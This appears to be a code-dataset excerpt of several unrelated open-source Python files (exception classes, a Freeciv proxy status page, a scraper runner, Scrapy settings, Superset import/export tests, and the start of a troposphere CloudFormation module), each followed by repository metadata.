class SystemCallError(BlacktieError):
"""Error raised when a problem occurs while attempting to run an external system call.
Attributes:
| ``errno`` -- return code from system call
        | ``filename`` -- file involved if any
| ``strerror`` -- error msg """
def __init__(self,errno,strerror,filename=None):
self.errno = errno
self.strerror = strerror
self.filename = filename
def __str__(self):
if not self.filename:
return """ERROR:\n %s.\nRETURN_STATE: %s.""" % (self.strerror.strip('\n'),
self.errno)
else:
return """ERROR in %s:\n %s.\nRETURN_STATE: %s.""" % (self.filename,
self.strerror.strip('\n'),
self.errno)
class SanityCheckError(BlacktieError):
"""When a 'state check' comes back as conflicting or nonsensical."""
pass
class UnexpectedValueError(BlacktieError):
"""When values that "should" not be possible happen; like if a variable was changed unexpectedly."""
pass
class InvalidFileFormatError(BlacktieError):
"""When errors occur due to malformed file formats."""
pass
class MissingArgumentError(BlacktieError):
"""When a required argument is missing from the parsed command line options."""
def __init__(self,errMsg):
self.msg = errMsg
def __str__(self):
return """ERROR: %s""" % (self.msg)
class InvalidOptionError(BlacktieError):
def __init__(self,optVal,optName,validVals=None):
self.optVal = optVal
self.optName = optName
self.validVals = validVals
def __str__(self):
if self.validVals:
return """ERROR: %s is not a valid value for arg:%s.\n\tValid values are: %s""" % (self.optVal,self.optName,self.validVals)
else:
return """ERROR: %s is not a valid value for arg:%s.""" % (self.optVal,self.optName)
| gpl-3.0 | 6,638,738,641,271,444,000 | 30.784091 | 135 | 0.554006 | false |
andreasrosdal/freeciv-web | freeciv-proxy/debugging.py | 2 | 2198 | # -*- coding: utf-8 -*-
'''
Freeciv - Copyright (C) 2009-2017 - Andreas Røsdal [email protected]
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
'''
import sys
from time import gmtime, strftime
import os
import platform
import threading
import time
from tornado import version as tornado_version
import gc
startTime = time.time()
def get_debug_info(civcoms):
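    # Build a small self-refreshing HTML status page (meta refresh every 20s)
    # summarising the proxy process, platform details and logged-in users.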
code = "<html><head><meta http-equiv=\"refresh\" content=\"20\">" \
+ "<link href='/css/bootstrap.min.css' rel='stylesheet'></head>" \
+ "<body><div class='container'>" \
+ "<h2>Freeciv WebSocket Proxy Status</h2>" \
+ "<font color=\"green\">Process status: OK</font><br>"
code += "<b>Process Uptime: " + \
str(int(time.time() - startTime)) + " s.</b><br>"
code += ("Python version: %s %s (%s)<br>" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
cpu = ' '.join(platform.processor().split())
code += ("Platform: %s %s on '%s' <br>" % (
platform.machine(),
platform.system(),
cpu))
code += ("Tornado version %s <br>" % (tornado_version))
code += ("Number of threads: %i <br>" % (threading.activeCount()))
try:
code += ("<h3>Logged in users (count %i) :</h3>" % len(civcoms))
for key in list(civcoms.keys()):
code += (
"username: <b>%s</b> <br>Civserver: %d<br>Connect time: %d<br><br>" %
(civcoms[key].username,
civcoms[key].civserverport,
time.time() - civcoms[key].connect_time))
except:
print(("Unexpected error:" + str(sys.exc_info()[0])))
raise
code += "</div></body></html>"
return code
| agpl-3.0 | -2,271,606,199,374,323,700 | 31.308824 | 85 | 0.600364 | false |
rconjaerts/uniresto-scraper | main.py | 1 | 2281 | import io
import os
import json
import requests
import logging
from multiprocessing import Pool, cpu_count
from multiprocessing.dummy import Pool as ThreadPool
import config
from uniresto.util.mplog import MultiProcessingLog
import uniscrapers
mplog = MultiProcessingLog(config.LOG_FILENAME, 'a', 0, 0)
mplog.setFormatter(logging.Formatter(config.LOG_FORMAT))
logging.basicConfig(level=logging.WARNING) # TODO: logging.WARNING
logging.getLogger().addHandler(mplog)
_instances = {}
def find_scrapers():
"""Returns a list of Scraper subclass instances
"""
plugins = []
for class_name in uniscrapers.__all__:
cls = getattr(uniscrapers, class_name)
# Only instantiate each plugin class once.
if class_name not in _instances:
_instances[class_name] = cls()
plugins.append(_instances[class_name])
return plugins
def dump(data, filename):
    # TODO: remove filename param when we are exporting to server
    # This JSON writing business is temporary, until the server is ready
    with io.open(os.path.join('.', filename), 'w', encoding='utf8') as f:
        f.write(unicode(json.dumps(data, ensure_ascii=False)))
    # TODO: wait for the server to be ready for us
    # r = requests.post(config.SERVER_URL,
    #              json=data,
    #              params={'passPhrase': config.SERVER_AUTH_TOKEN})
    # logging.info(r)
def run_scraper(scraper):
""" Runs the Scraper to get the data and dump it somewhere (db, json, ...)
"""
def get_data_and_dump((url, lang)):
try:
data = scraper.get_data(url, lang)
if not data:
raise Exception('lege data')
# TODO: remove filename param
dump(data, scraper.name + '_' + lang + '.json')
except Exception as exc:
# TODO: proper exception handling, not this catch-all crap
# TODO: reschedule this scraper
logging.exception(exc)
scraper.log = logging
pool = ThreadPool()
pool.map(get_data_and_dump, scraper.remotes)
def main():
logging.info("Start scraping")
pool = Pool(cpu_count() // 2)
pool.map(run_scraper, find_scrapers())
logging.info("Finish scraping")
if __name__ == '__main__':
main()
| gpl-2.0 | 3,455,024,879,674,022,000 | 27.873418 | 78 | 0.640509 | false |
sechiro/crawlers | curation_spider/settings.py | 1 | 3082 | # -*- coding: utf-8 -*-
# Scrapy settings for curation_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'curation_spider'
SPIDER_MODULES = ['curation_spider.spiders']
NEWSPIDER_MODULE = 'curation_spider.spiders'
DUPEFILTER_DEBUG = True
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'curation_spider (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY=1
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'curation_spider.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'curation_spider.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'curation_spider.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| apache-2.0 | -2,649,747,837,076,849,700 | 35.258824 | 109 | 0.776119 | false |
zhouyao1994/incubator-superset | tests/import_export_tests.py | 1 | 28880 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
"""Unit tests for Superset"""
import json
import unittest
from flask import g
from sqlalchemy.orm.session import make_transient
from tests.test_app import app
from superset import db, security_manager
from superset.connectors.druid.models import DruidColumn, DruidDatasource, DruidMetric
from superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn
from superset.models import core as models
from superset.utils import core as utils
from .base_tests import SupersetTestCase
class ImportExportTests(SupersetTestCase):
"""Testing export import functionality for dashboards"""
@classmethod
def delete_imports(cls):
with app.app_context():
# Imported data clean up
session = db.session
for slc in session.query(models.Slice):
if "remote_id" in slc.params_dict:
session.delete(slc)
for dash in session.query(models.Dashboard):
if "remote_id" in dash.params_dict:
session.delete(dash)
for table in session.query(SqlaTable):
if "remote_id" in table.params_dict:
session.delete(table)
for datasource in session.query(DruidDatasource):
if "remote_id" in datasource.params_dict:
session.delete(datasource)
session.commit()
@classmethod
def setUpClass(cls):
cls.delete_imports()
cls.create_druid_test_objects()
@classmethod
def tearDownClass(cls):
cls.delete_imports()
def create_slice(
self,
name,
ds_id=None,
id=None,
db_name="examples",
table_name="wb_health_population",
):
params = {
"num_period_compare": "10",
"remote_id": id,
"datasource_name": table_name,
"database_name": db_name,
"schema": "",
# Test for trailing commas
"metrics": ["sum__signup_attempt_email", "sum__signup_attempt_facebook"],
}
if table_name and not ds_id:
table = self.get_table_by_name(table_name)
if table:
ds_id = table.id
return models.Slice(
slice_name=name,
datasource_type="table",
viz_type="bubble",
params=json.dumps(params),
datasource_id=ds_id,
id=id,
)
def create_dashboard(self, title, id=0, slcs=[]):
json_metadata = {"remote_id": id}
return models.Dashboard(
id=id,
dashboard_title=title,
slices=slcs,
position_json='{"size_y": 2, "size_x": 2}',
slug="{}_imported".format(title.lower()),
json_metadata=json.dumps(json_metadata),
)
def create_table(self, name, schema="", id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "examples"}
table = SqlaTable(
id=id, schema=schema, table_name=name, params=json.dumps(params)
)
for col_name in cols_names:
table.columns.append(TableColumn(column_name=col_name))
for metric_name in metric_names:
table.metrics.append(SqlMetric(metric_name=metric_name, expression=""))
return table
def create_druid_datasource(self, name, id=0, cols_names=[], metric_names=[]):
params = {"remote_id": id, "database_name": "druid_test"}
datasource = DruidDatasource(
id=id,
datasource_name=name,
cluster_name="druid_test",
params=json.dumps(params),
)
for col_name in cols_names:
datasource.columns.append(DruidColumn(column_name=col_name))
for metric_name in metric_names:
datasource.metrics.append(DruidMetric(metric_name=metric_name, json="{}"))
return datasource
def get_slice(self, slc_id):
return db.session.query(models.Slice).filter_by(id=slc_id).first()
def get_slice_by_name(self, name):
return db.session.query(models.Slice).filter_by(slice_name=name).first()
def get_dash(self, dash_id):
return db.session.query(models.Dashboard).filter_by(id=dash_id).first()
def get_datasource(self, datasource_id):
return db.session.query(DruidDatasource).filter_by(id=datasource_id).first()
def get_table_by_name(self, name):
return db.session.query(SqlaTable).filter_by(table_name=name).first()
def assert_dash_equals(self, expected_dash, actual_dash, check_position=True):
self.assertEqual(expected_dash.slug, actual_dash.slug)
self.assertEqual(expected_dash.dashboard_title, actual_dash.dashboard_title)
self.assertEqual(len(expected_dash.slices), len(actual_dash.slices))
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
self.assert_slice_equals(e_slc, a_slc)
if check_position:
self.assertEqual(expected_dash.position_json, actual_dash.position_json)
def assert_table_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.table_name, actual_ds.table_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(expected_ds.schema, actual_ds.schema)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_datasource_equals(self, expected_ds, actual_ds):
self.assertEqual(expected_ds.datasource_name, actual_ds.datasource_name)
self.assertEqual(expected_ds.main_dttm_col, actual_ds.main_dttm_col)
self.assertEqual(len(expected_ds.metrics), len(actual_ds.metrics))
self.assertEqual(len(expected_ds.columns), len(actual_ds.columns))
self.assertEqual(
set([c.column_name for c in expected_ds.columns]),
set([c.column_name for c in actual_ds.columns]),
)
self.assertEqual(
set([m.metric_name for m in expected_ds.metrics]),
set([m.metric_name for m in actual_ds.metrics]),
)
def assert_slice_equals(self, expected_slc, actual_slc):
# to avoid bad slice data (no slice_name)
expected_slc_name = expected_slc.slice_name or ""
actual_slc_name = actual_slc.slice_name or ""
self.assertEqual(expected_slc_name, actual_slc_name)
self.assertEqual(expected_slc.datasource_type, actual_slc.datasource_type)
self.assertEqual(expected_slc.viz_type, actual_slc.viz_type)
exp_params = json.loads(expected_slc.params)
actual_params = json.loads(actual_slc.params)
diff_params_keys = (
"schema",
"database_name",
"datasource_name",
"remote_id",
"import_time",
)
for k in diff_params_keys:
if k in actual_params:
actual_params.pop(k)
if k in exp_params:
exp_params.pop(k)
self.assertEqual(exp_params, actual_params)
def assert_only_exported_slc_fields(self, expected_dash, actual_dash):
""" only exported json has this params
imported/created dashboard has relationships to other models instead
"""
expected_slices = sorted(expected_dash.slices, key=lambda s: s.slice_name or "")
actual_slices = sorted(actual_dash.slices, key=lambda s: s.slice_name or "")
for e_slc, a_slc in zip(expected_slices, actual_slices):
params = a_slc.params_dict
self.assertEqual(e_slc.datasource.name, params["datasource_name"])
self.assertEqual(e_slc.datasource.schema, params["schema"])
self.assertEqual(e_slc.datasource.database.name, params["database_name"])
def test_export_1_dashboard(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
export_dash_url = "/dashboard/export_dashboards_form?id={}&action=go".format(
birth_dash.id
)
resp = self.client.get(export_dash_url)
exported_dashboards = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["dashboards"]
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id,
json.loads(
exported_dashboards[0].json_metadata,
object_hook=utils.decode_dashboards,
)["remote_id"],
)
exported_tables = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)["datasources"]
self.assertEqual(1, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
def test_export_2_dashboards(self):
self.login("admin")
birth_dash = self.get_dash_by_slug("births")
world_health_dash = self.get_dash_by_slug("world_health")
export_dash_url = "/dashboard/export_dashboards_form?id={}&id={}&action=go".format(
birth_dash.id, world_health_dash.id
)
resp = self.client.get(export_dash_url)
resp_data = json.loads(
resp.data.decode("utf-8"), object_hook=utils.decode_dashboards
)
exported_dashboards = sorted(
resp_data.get("dashboards"), key=lambda d: d.dashboard_title
)
self.assertEqual(2, len(exported_dashboards))
birth_dash = self.get_dash_by_slug("births")
self.assert_only_exported_slc_fields(birth_dash, exported_dashboards[0])
self.assert_dash_equals(birth_dash, exported_dashboards[0])
self.assertEqual(
birth_dash.id, json.loads(exported_dashboards[0].json_metadata)["remote_id"]
)
world_health_dash = self.get_dash_by_slug("world_health")
self.assert_only_exported_slc_fields(world_health_dash, exported_dashboards[1])
self.assert_dash_equals(world_health_dash, exported_dashboards[1])
self.assertEqual(
world_health_dash.id,
json.loads(exported_dashboards[1].json_metadata)["remote_id"],
)
exported_tables = sorted(
resp_data.get("datasources"), key=lambda t: t.table_name
)
self.assertEqual(2, len(exported_tables))
self.assert_table_equals(
self.get_table_by_name("birth_names"), exported_tables[0]
)
self.assert_table_equals(
self.get_table_by_name("wb_health_population"), exported_tables[1]
)
def test_import_1_slice(self):
expected_slice = self.create_slice("Import Me", id=10001)
slc_id = models.Slice.import_obj(expected_slice, None, import_time=1989)
slc = self.get_slice(slc_id)
self.assertEqual(slc.datasource.perm, slc.perm)
self.assert_slice_equals(expected_slice, slc)
table_id = self.get_table_by_name("wb_health_population").id
self.assertEqual(table_id, self.get_slice(slc_id).datasource_id)
def test_import_2_slices_for_same_table(self):
table_id = self.get_table_by_name("wb_health_population").id
# table_id != 666, import func will have to find the table
slc_1 = self.create_slice("Import Me 1", ds_id=666, id=10002)
slc_id_1 = models.Slice.import_obj(slc_1, None)
slc_2 = self.create_slice("Import Me 2", ds_id=666, id=10003)
slc_id_2 = models.Slice.import_obj(slc_2, None)
imported_slc_1 = self.get_slice(slc_id_1)
imported_slc_2 = self.get_slice(slc_id_2)
self.assertEqual(table_id, imported_slc_1.datasource_id)
self.assert_slice_equals(slc_1, imported_slc_1)
self.assertEqual(imported_slc_1.datasource.perm, imported_slc_1.perm)
self.assertEqual(table_id, imported_slc_2.datasource_id)
self.assert_slice_equals(slc_2, imported_slc_2)
self.assertEqual(imported_slc_2.datasource.perm, imported_slc_2.perm)
def test_import_slices_for_non_existent_table(self):
with self.assertRaises(AttributeError):
models.Slice.import_obj(
self.create_slice("Import Me 3", id=10004, table_name="non_existent"),
None,
)
def test_import_slices_override(self):
slc = self.create_slice("Import Me New", id=10005)
slc_1_id = models.Slice.import_obj(slc, None, import_time=1990)
slc.slice_name = "Import Me New"
imported_slc_1 = self.get_slice(slc_1_id)
slc_2 = self.create_slice("Import Me New", id=10005)
slc_2_id = models.Slice.import_obj(slc_2, imported_slc_1, import_time=1990)
self.assertEqual(slc_1_id, slc_2_id)
imported_slc_2 = self.get_slice(slc_2_id)
self.assert_slice_equals(slc, imported_slc_2)
def test_import_empty_dashboard(self):
empty_dash = self.create_dashboard("empty_dashboard", id=10001)
imported_dash_id = models.Dashboard.import_obj(empty_dash, import_time=1989)
imported_dash = self.get_dash(imported_dash_id)
self.assert_dash_equals(empty_dash, imported_dash, check_position=False)
def test_import_dashboard_1_slice(self):
slc = self.create_slice("health_slc", id=10006)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice", slcs=[slc], id=10002
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_1_slice, import_time=1990
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard("dash_with_1_slice", slcs=[slc], id=10002)
make_transient(expected_dash)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990},
json.loads(imported_dash.json_metadata),
)
expected_position = dash_with_1_slice.position
# new slice id (auto-incremental) assigned on insert
# id from json is used only for updating position with new id
meta = expected_position["DASHBOARD_CHART_TYPE-10006"]["meta"]
meta["chartId"] = imported_dash.slices[0].id
self.assertEqual(expected_position, imported_dash.position)
def test_import_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10007, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10008, table_name="birth_names")
dash_with_2_slices = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
dash_with_2_slices.json_metadata = json.dumps(
{
"remote_id": 10003,
"filter_immune_slices": ["{}".format(e_slc.id)],
"expanded_slices": {
"{}".format(e_slc.id): True,
"{}".format(b_slc.id): False,
},
}
)
imported_dash_id = models.Dashboard.import_obj(
dash_with_2_slices, import_time=1991
)
imported_dash = self.get_dash(imported_dash_id)
expected_dash = self.create_dashboard(
"dash_with_2_slices", slcs=[e_slc, b_slc], id=10003
)
make_transient(expected_dash)
self.assert_dash_equals(imported_dash, expected_dash, check_position=False)
i_e_slc = self.get_slice_by_name("e_slc")
i_b_slc = self.get_slice_by_name("b_slc")
expected_json_metadata = {
"remote_id": 10003,
"import_time": 1991,
"filter_immune_slices": ["{}".format(i_e_slc.id)],
"expanded_slices": {
"{}".format(i_e_slc.id): True,
"{}".format(i_b_slc.id): False,
},
}
self.assertEqual(
expected_json_metadata, json.loads(imported_dash.json_metadata)
)
def test_import_override_dashboard_2_slices(self):
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
dash_to_import = self.create_dashboard(
"override_dashboard", slcs=[e_slc, b_slc], id=10004
)
imported_dash_id_1 = models.Dashboard.import_obj(
dash_to_import, import_time=1992
)
# create new instances of the slices
e_slc = self.create_slice("e_slc", id=10009, table_name="energy_usage")
b_slc = self.create_slice("b_slc", id=10010, table_name="birth_names")
c_slc = self.create_slice("c_slc", id=10011, table_name="birth_names")
dash_to_import_override = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
imported_dash_id_2 = models.Dashboard.import_obj(
dash_to_import_override, import_time=1992
)
# override doesn't change the id
self.assertEqual(imported_dash_id_1, imported_dash_id_2)
expected_dash = self.create_dashboard(
"override_dashboard_new", slcs=[e_slc, b_slc, c_slc], id=10004
)
make_transient(expected_dash)
imported_dash = self.get_dash(imported_dash_id_2)
self.assert_dash_equals(expected_dash, imported_dash, check_position=False)
self.assertEqual(
{"remote_id": 10004, "import_time": 1992},
json.loads(imported_dash.json_metadata),
)
def test_import_new_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10200)
# set another user as an owner of importing dashboard
dash_with_1_slice.created_by = admin_user
dash_with_1_slice.changed_by = admin_user
dash_with_1_slice.owners = [admin_user]
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def test_import_override_dashboard_slice_reset_ownership(self):
admin_user = security_manager.find_user(username="admin")
self.assertTrue(admin_user)
gamma_user = security_manager.find_user(username="gamma")
self.assertTrue(gamma_user)
g.user = gamma_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
# re-import with another user shouldn't change the permissions
g.user = admin_user
dash_with_1_slice = self._create_dashboard_for_import(id_=10300)
imported_dash_id = models.Dashboard.import_obj(dash_with_1_slice)
imported_dash = self.get_dash(imported_dash_id)
self.assertEqual(imported_dash.created_by, gamma_user)
self.assertEqual(imported_dash.changed_by, gamma_user)
self.assertEqual(imported_dash.owners, [gamma_user])
imported_slc = imported_dash.slices[0]
self.assertEqual(imported_slc.created_by, gamma_user)
self.assertEqual(imported_slc.changed_by, gamma_user)
self.assertEqual(imported_slc.owners, [gamma_user])
def _create_dashboard_for_import(self, id_=10100):
slc = self.create_slice("health_slc" + str(id_), id=id_ + 1)
dash_with_1_slice = self.create_dashboard(
"dash_with_1_slice" + str(id_), slcs=[slc], id=id_ + 2
)
dash_with_1_slice.position_json = """
{{"DASHBOARD_VERSION_KEY": "v2",
"DASHBOARD_CHART_TYPE-{0}": {{
"type": "DASHBOARD_CHART_TYPE",
"id": {0},
"children": [],
"meta": {{
"width": 4,
"height": 50,
"chartId": {0}
}}
}}
}}
""".format(
slc.id
)
return dash_with_1_slice
def test_import_table_no_metadata(self):
table = self.create_table("pure_table", id=10001)
imported_id = SqlaTable.import_obj(table, import_time=1989)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_1_col_1_met(self):
table = self.create_table(
"table_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1990)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "examples"},
json.loads(imported.params),
)
def test_import_table_2_col_2_met(self):
table = self.create_table(
"table_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
imported = self.get_table(imported_id)
self.assert_table_equals(table, imported)
def test_import_table_override(self):
table = self.create_table(
"table_override", id=10003, cols_names=["col1"], metric_names=["m1"]
)
imported_id = SqlaTable.import_obj(table, import_time=1991)
table_over = self.create_table(
"table_override",
id=10003,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = SqlaTable.import_obj(table_over, import_time=1992)
imported_over = self.get_table(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_table = self.create_table(
"table_override",
id=10003,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_table_equals(expected_table, imported_over)
def test_import_table_override_identical(self):
table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = SqlaTable.import_obj(table, import_time=1993)
copy_table = self.create_table(
"copy_cat",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = SqlaTable.import_obj(copy_table, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_table_equals(copy_table, self.get_table(imported_id))
def test_import_druid_no_metadata(self):
datasource = self.create_druid_datasource("pure_druid", id=10001)
imported_id = DruidDatasource.import_obj(datasource, import_time=1989)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_1_col_1_met(self):
datasource = self.create_druid_datasource(
"druid_1_col_1_met", id=10002, cols_names=["col1"], metric_names=["metric1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1990)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
self.assertEqual(
{"remote_id": 10002, "import_time": 1990, "database_name": "druid_test"},
json.loads(imported.params),
)
def test_import_druid_2_col_2_met(self):
datasource = self.create_druid_datasource(
"druid_2_col_2_met",
id=10003,
cols_names=["c1", "c2"],
metric_names=["m1", "m2"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
imported = self.get_datasource(imported_id)
self.assert_datasource_equals(datasource, imported)
def test_import_druid_override(self):
datasource = self.create_druid_datasource(
"druid_override", id=10004, cols_names=["col1"], metric_names=["m1"]
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1991)
table_over = self.create_druid_datasource(
"druid_override",
id=10004,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_over_id = DruidDatasource.import_obj(table_over, import_time=1992)
imported_over = self.get_datasource(imported_over_id)
self.assertEqual(imported_id, imported_over.id)
expected_datasource = self.create_druid_datasource(
"druid_override",
id=10004,
metric_names=["new_metric1", "m1"],
cols_names=["col1", "new_col1", "col2", "col3"],
)
self.assert_datasource_equals(expected_datasource, imported_over)
def test_import_druid_override_identical(self):
datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id = DruidDatasource.import_obj(datasource, import_time=1993)
copy_datasource = self.create_druid_datasource(
"copy_cat",
id=10005,
cols_names=["new_col1", "col2", "col3"],
metric_names=["new_metric1"],
)
imported_id_copy = DruidDatasource.import_obj(copy_datasource, import_time=1994)
self.assertEqual(imported_id, imported_id_copy)
self.assert_datasource_equals(copy_datasource, self.get_datasource(imported_id))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -5,938,705,838,612,700,000 | 40.494253 | 91 | 0.604778 | false |
cloudtools/troposphere | troposphere/certificatemanager.py | 1 | 1246 | # Copyright (c) 2012-2021, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 31.1.0
from troposphere import Tags
from . import AWSObject, AWSProperty
from .validators import integer
class ExpiryEventsConfiguration(AWSProperty):
props = {
"DaysBeforeExpiry": (integer, False),
}
class Account(AWSObject):
resource_type = "AWS::CertificateManager::Account"
props = {
"ExpiryEventsConfiguration": (ExpiryEventsConfiguration, True),
}
class DomainValidationOption(AWSProperty):
props = {
"DomainName": (str, True),
